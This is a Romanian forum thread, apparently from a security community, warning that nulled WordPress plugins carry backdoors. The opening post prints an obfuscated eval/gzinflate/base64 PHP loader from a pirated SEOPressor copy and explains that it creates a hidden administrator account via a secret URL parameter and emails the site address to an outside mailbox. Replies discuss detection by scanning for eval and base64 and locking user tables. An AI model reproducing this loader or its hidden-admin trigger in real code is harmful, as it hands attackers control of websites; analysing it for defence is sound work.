Jump to content
Nest

Despre continutul Premium oferit in mod "Gratuit"

Recommended Posts

Vad in ultima perioada o multime de lume intreband de chestii nulled, pentru ca totul e roz bombon cand vine vorba de Internet, stim cu totii. Am sa va arat cateva exemple sa vedeti ce va ofera pluginurile/temele/scripturile nulled, fata de versiunile oficiale:

SEOPressor - Pret original: 47$ +

Chestia asta e chiar de pe un site romanesc. Pluginul era instalat in directorul wp-content/plugins/seo-pressor(gratuit). Deja cuvantul "gratuit" forma o idee generala despre continutul directorului. Folosind un plugin de scan, s-a gasit urmatorul cod in site (seo-pressor(gratuit)/classes/central.class.php):

eval (gzinflate( base64 _decode("NdLJlmNQAADQX8muqo6FIKZTXV0HEUKixCybPsIzBOGZHu/ruzf9B3dxd9+/f333Zb8DS9Ls3gtcvfImmcD7IxkBd/
iTgbTLwPublZ2MEZ6RJB1vkD/yYYV8OdYhuTCXwq+1882AVrOXpUJzbr507gkxWLZRYOfc5llCsyRMdIZxv+sW6N0ICq6h6Bm/
5us1pVADcjlCnsm5tttpIWyHnzkwyMqVJTOupEbLBCE50lcVtKnLKc999/JlZDWRcO8yqve1TKRiND7ZXnsJBW5L0zwJVuFQMQmXgTPLNZnw/PCObVCZ+YO56TOih0TzlIvhqgqpH+jUUgfVXVFrVPDRk6eKdDL1aNQgr2J5wB5Z0GErnQ3muWGF6ktS9a27sYinLuRjpUrQK6GktGCw+pMNqVq84FQCnQBKqUw3vjvT6B8ZyJAgDuEcimHia1660nhruAX71qNCOBjmvMw9q6DN4ukIgufPUyQNmX9ao1YPak6p96OGzSZoj86NPlkXEWnUvSBQzJouKDYxdsKoOTDeA3sxP17dWfxxs4S8HyeWkcYWsmMYieaS2TVR0RfOgw2Xygbrv6I03xIkKlQNfGUTmj4wsOgQdvailUayKYpaL8EVwG1aJTgcMufcgbogTeEAtf1pXp6EzYiru0XYPkcCT/I6+vp623187D4+d/+L/QU=" )) );

Dupa decriptare:

cXq11vv.gif

Deci, exista doua functii introduse in "wp_head" => sunt executate la fiecare incarcare de pagina.

Prima functie, my_wpfunww7x(), creeaza un utilizator "wordpress" cu parola "gh67io9Cjm" cu permisiuni de administrator. Asta se intampla numai in cazul in care URLul paginii are parametrul "cms" de tip GET cu valoarea "jjoplmh". Ex: Success | .xyz Domain Names | Join Generation XYZ

A doua, my_wpfunww7c8(), verifica daca exista utilizatorul. Daca nu, trimite un e-mail catre adresa "thomasasza@gmx.com", cu URLul blogului in subiect si "WordPress Plugin" in continut.

Logica e simpla:

  1. Cand pluginul e instalat, imediat se trimite un e-mail la adresa celui care a introdus backdoorul (thomasasza@gmx.com)
  2. Acesta intra pe blog, si acceseaza ?cms=jjoplmh in URL.
  3. Prin accesarea acelui URL, se creeaza utilizatorul cu permisiuni de administrator. Acum el se poate loga pe blog ca si cand al lui si are acces la tot, ceea ce poate duce la lucruri mai grave, cum ar fi compromiterea intregului server.

SEOPressor - Pret original: 42$ +

Backdoorul se afla in fisierul: wp-content/restrict-content-pro/includes/sidebar.php - #8966576 - Pastie - daca va uitati atent, aproape tot codul este comentat, mai putin urmatoarea chestie:

tE6F7Fs.gif

Arata similar, nu? Singura diferenta dintre pluginul precedent este o functie numita diferit (my_wpfunww458, si adresa de e-mail, care decodata devine wordpresssslog@yandex.com

Codul de sus se ocupa de partea de trimitere a e-mailului. Cel care creeaza utilizatorul cu drepturi de administrator se afla in fisierul wp-content/restrict-content-pro/includes/class.php - #8966599 - Pastie - aceeasi strategie, aproape tot codul comentat, mai putin:

WWtYrmC.gif

de data asta, folosindu-se de parametrul ?cms=go

Si, in ultimul rand, modificarea fisierului wp-content/restrict-content-pro/restrict-content-pro.php pentru a executa cele doua comenzi:

wp-content/restrict-content-pro/restrict-content-pro.php

Si cam atat, ca e aproape 1 noaptea si deja mi-e somn. Nu luati chestii nulled, daca nu aveti buget inseamna ca nu aveti neaparata nevoie de ele si o alternativa gratuita este ceea ce va trebuie. www.sucuri.net @pr0fw3b think about it.

Edited by Nest
  • Upvote 1
Link to comment
Share on other sites

Cand folositi tema/plugin/script din astea nulled dati mereu scan dupa base64 _decode in folder ca nu poti sa stii niciodata, sau mai bine te uiti prin cod ca se poate sa fie si in plain text asa ceva.

Degeaba dai scan numaii dupa base64, metode de obfuscare sunt multe. Cel mai bine e sa cumperi ce ai nevoie.

Sent from my UTOK 470 Q using Tapatalk

Link to comment
Share on other sites

Degeaba dai scan numaii dupa base64, metode de obfuscare sunt multe. Cel mai bine e sa cumperi ce ai nevoie.

Sent from my UTOK 470 Q using Tapatalk

Ideal asa ar fi sa cumperi nu iau aparatrea pirateriei dar inca traim in lumea a 3-a cel putin la nivel european, unde la noi salariile sunt de 3 ori mai mici si mancarea de 3 ori mai scumpa deci...oricum cred ca toti am folosit vreodata sau folosim ceva nulled.

Link to comment
Share on other sites

Cum am putea scana cele doua foldere din wordpress themes si plugins pentru eventuale base64 sau alte metode de obfuscare ?

Am sa scriu azi un tutorial despre scanarea WordPress pentru backdoors.

Ideal asa ar fi sa cumperi nu iau aparatrea pirateriei dar inca traim in lumea a 3-a cel putin la nivel european, unde la noi salariile sunt de 3 ori mai mici si mancarea de 3 ori mai scumpa deci...oricum cred ca toti am folosit vreodata sau folosim ceva nulled.

Dupa cum am zis, daca nu ai o afacere sau macar un site din care sa poti scoate profit, nu ai nevoie de ceva platit. Alternative sunt peste tot, gratuite. Mai bine free dar sigur, decat nulled si sa te trezesti cu surprize. Sau iti construiesti, la fel ca si resursele free, tutoriale free exista chiar mai multe, pe langa faptul ca stii ce muncesti si iti faci cum vrei, mai si inveti ceva. Un incepator, pentru o tema de WordPress simpla, cam in 2 saptamani termina.

Link to comment
Share on other sites

Nu e neaparat nevoie sa o cumperi sau sa te feresti de nulled ca dracu' de tamaie.

Iti iei frumos un plugin nulled sa zicem, il instalezi mai intai pe un server local, in PC sa vezi cum se comporta si daca functioneaza ca poate e varianta trial si e teapa.

Daca merge asa cum te asteptai, atunci te apuci si iei la citit codul sa vezi ce face codul respectiv. Ce nu-ti convine, stergi. Ce e asa de greu ? Toata lumea stie ca temele/pluginurile nulled nu sunt clean dar asta nu inseamna ca nu ti le poti face tu singur clean. Stergi cateva linii de cod si nu mai dai $50 sau $70. Eu zic ca se merita.

Link to comment
Share on other sites

Nu e neaparat nevoie sa o cumperi sau sa te feresti de nulled ca dracu' de tamaie.

Iti iei frumos un plugin nulled sa zicem, il instalezi mai intai pe un server local, in PC sa vezi cum se comporta si daca functioneaza ca poate e varianta trial si e teapa.

Daca merge asa cum te asteptai, atunci te apuci si iei la citit codul sa vezi ce face codul respectiv. Ce nu-ti convine, stergi. Ce e asa de greu ? Toata lumea stie ca temele/pluginurile nulled nu sunt clean dar asta nu inseamna ca nu ti le poti face tu singur clean. Stergi cateva linii de cod si nu mai dai $50 sau $70. Eu zic ca se merita.

Keep it up, buna mentalitate ai.

Link to comment
Share on other sites

xoxo Notepad++ search in all files -_-.

Wemahu

Adica ? De ce n-as avea dreptate in ceea ce zic ?

Daca ai fi citit cu putina atentie, ai vedea ca sunt mult mai multe moduri de a obfusca acele backdooruri, chestiile astea sunt, sa spunem, mid-level, care le-am prezentat in tutorial. Dar daca tu vrei sa mergi pe riscul tau, fa-o. O data ai sa te convingi ca nu ai avut.

Link to comment
Share on other sites

Wemahu

Daca ai fi citit cu putina atentie, ai vedea ca sunt mult mai multe moduri de a obfusca acele backdooruri, chestiile astea sunt, sa spunem, mid-level, care le-am prezentat in tutorial. Dar daca tu vrei sa mergi pe riscul tau, fa-o. O data ai sa te convingi ca nu ai avut.

Sunt, stiu ca sunt. Dar tu nu iti faci tu singur pluginul fiindca iti vine greu. Munca e grea. Dar de citit codul il poti citi si vezi ce face. Unde nu-ti convine ce face dai delete. E simplu.

Link to comment
Share on other sites

daca pune cineva codul ala php sau criptat intr-un plugin oarecare ,se formeaza un user "administrator" oricand pe site? coduri de genu se pot gasi si in temele wordpress sub o alta forma? intreb deoarece am 2 site-uri ce folosesc wordprees nullled

Da, se pot gasi sub multe forme, deci iti recomand sa treci pe o tema gratuita.

Bine ca iai informat pe toti . Si eu faceam chestia asta inainte (Am invatat dupa blogul lui tinkode:)) ).

Nothing stays forever.

Link to comment
Share on other sites

Ca si tehnici de mitigare am putea folosi urmatoarele abordari:

  • Blocarea bazei de date/tabelei pentru adaugarea de utilizatori:

    ALTER DATABASE <baza de date>
    SET READ_ONLY
    WITH NO_WAIT

    LOCK TABLES tabela WRITE;
    -- Dupa ce suntem siguri
    UNLOCK TABLES;

    Putem da lock la tabela cu utilizatori admini dupa ce ne-am creat unul.


  • Detectarea de base_64 este simpla(cautam un string in mod recursiv in sursa). Problema este a un algoritm de codare base_58 sau base_71 este foarte usor de implementat sub un nume diferit ca si functie. In acest caz am putea face cautarea dupa apelul functiei eval(). Aceasta ar acoperi majoritatea problemelor legate de decoarea si interpretarea unui string ca si cod php.
  • Am putea face un hook pe mailer daemon(toate apelurile sunt interceptate astfel). Urmatorul tutorial ne poate fi de folos:
    Redirecting functions in shared ELF libraries - CodeProject

Edited by Ganav
Link to comment
Share on other sites

Ca si tehnici de mitigare am putea folosi urmatoarele abordari:

  • Blocarea bazei de date/tabelei pentru adaugarea de utilizatori:

    ALTER DATABASE <baza de date>
    SET READ_ONLY
    WITH NO_WAIT

    LOCK TABLES tabela WRITE;
    -- Dupa ce suntem siguri
    UNLOCK TABLES;

    Putem da lock la tabela cu utilizatori admini dupa ce ne-am creat unul.


  • Detectarea de base_64 este simpla(cautam un string in mod recursiv in sursa). Problema este a un algoritm de codare base_58 sau base_71 este foarte usor de implementat sub un nume diferit ca si functie. In acest caz am putea face cautarea dupa apelul functiei eval(). Aceasta ar acoperi majoritatea problemelor legate de decoarea si interpretarea unui string ca si cod php.
  • Am putea face un hook pe mailer daemon(toate apelurile sunt interceptate astfel). Urmatorul tutorial ne poate fi de folos:
    Redirecting functions in shared ELF libraries - CodeProject

Problema cu acea comanda este ca blocheaza si utilizatorul curent la versiunile sub 3.2.1 ; desi nu cred ca o mai foloseste cineva, e bine de stiut.

Link to comment
Share on other sites

Ca si tehnici de mitigare am putea folosi urmatoarele abordari:

  • Blocarea bazei de date/tabelei pentru adaugarea de utilizatori:

    ALTER DATABASE <baza de date>
    SET READ_ONLY
    WITH NO_WAIT

    LOCK TABLES tabela WRITE;
    -- Dupa ce suntem siguri
    UNLOCK TABLES;

    Putem da lock la tabela cu utilizatori admini dupa ce ne-am creat unul.


  • Detectarea de base_64 este simpla(cautam un string in mod recursiv in sursa). Problema este a un algoritm de codare base_58 sau base_71 este foarte usor de implementat sub un nume diferit ca si functie. In acest caz am putea face cautarea dupa apelul functiei eval(). Aceasta ar acoperi majoritatea problemelor legate de decoarea si interpretarea unui string ca si cod php.
  • Am putea face un hook pe mailer daemon(toate apelurile sunt interceptate astfel). Urmatorul tutorial ne poate fi de folos:
    Redirecting functions in shared ELF libraries - CodeProject

pe unde ar trebui scris codul?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...